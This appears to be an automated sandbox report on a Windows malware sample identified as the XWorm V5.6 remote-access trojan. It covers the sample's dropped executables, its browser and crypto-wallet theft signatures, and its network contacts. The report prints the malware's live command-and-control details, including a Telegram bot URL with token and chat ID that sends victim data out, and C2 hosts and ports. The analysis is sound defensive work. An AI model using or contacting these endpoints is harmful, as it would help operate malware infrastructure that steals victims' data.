Source: Yara match File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1474423 Sample: Ekpb7jn7mf.exe Startdate: 16/07/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 pst-child.gl.at.ply.gg 2->42 44 api.ip.sb 2->44 68 Snort IDS alert for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 76 18 other signatures 2->76 9 Ekpb7jn7mf.exe 10 2->9         started        13 Calculator.exe 2 2->13         started        signatures3 74 Uses the Telegram API (likely for C&C communication) 40->74 process4 file5 34 C:\Users\user\AppData\Local\...\wjoqZlIS.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\rKPaQokQ.exe, PE32+ 9->36 dropped 38 C:\Users\user\AppData\Local\...\YsrQekGS.exe, PE32 9->38 dropped 82 Found many strings related to Crypto-Wallets (likely being stolen) 9->82 15 YsrQekGS.exe 14 3 9->15         started        19 wjoqZlIS.exe 15 48 9->19         started        21 rKPaQokQ.exe 12 9->21         started        signatures6 process7 dnsIp8 46 api.telegram.org 149.154.167.220, 443, 49745 TELEGRAMRU United Kingdom 15->46 48 45.88.186.18, 49746, 7000 ANONYMIZEEpikNetworkCH Netherlands 15->48 52 Antivirus detection for dropped file 15->52 54 Multi AV Scanner detection for dropped file 15->54 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->56 66 4 other signatures 15->66 23 powershell.exe 15->23         started        26 powershell.exe 15->26         started        50 pst-child.gl.at.ply.gg 147.185.221.20, 49730, 49737, 49738 SALSGIVERUS United States 19->50 58 Found many strings related to Crypto-Wallets (likely being stolen) 19->58 60 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->60 62 Tries to harvest and steal browser information (history, passwords, etc) 19->62 64 Tries to steal Crypto Currency Wallets 19->64 28 conhost.exe 19->28         started        signatures9 process10 signatures11 78 Found many strings related to Crypto-Wallets (likely being stolen) 23->78 80 Loading BitLocker PowerShell Module 23->80 30 conhost.exe 23->30         started        32 conhost.exe 26->32         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
45.88.186.18
 unknown Netherlands
34962 ANONYMIZEEpikNetworkCH true
147.185.221.20
 pst-child.gl.at.ply.gg United States
12087 SALSGIVERUS true

Contacted Domains

Name IP Active
pst-child.gl.at.ply.gg 147.185.221.20 true
api.telegram.org 149.154.167.220 true
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
45.88.186.18 true
  • Avira URL Cloud: safe
 unknown
pst-child.gl.at.ply.gg:9336 true
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 false
  • Avira URL Cloud: safe
 unknown
http://pst-child.gl.at.ply.gg:9336/ false
  • Avira URL Cloud: safe
 unknown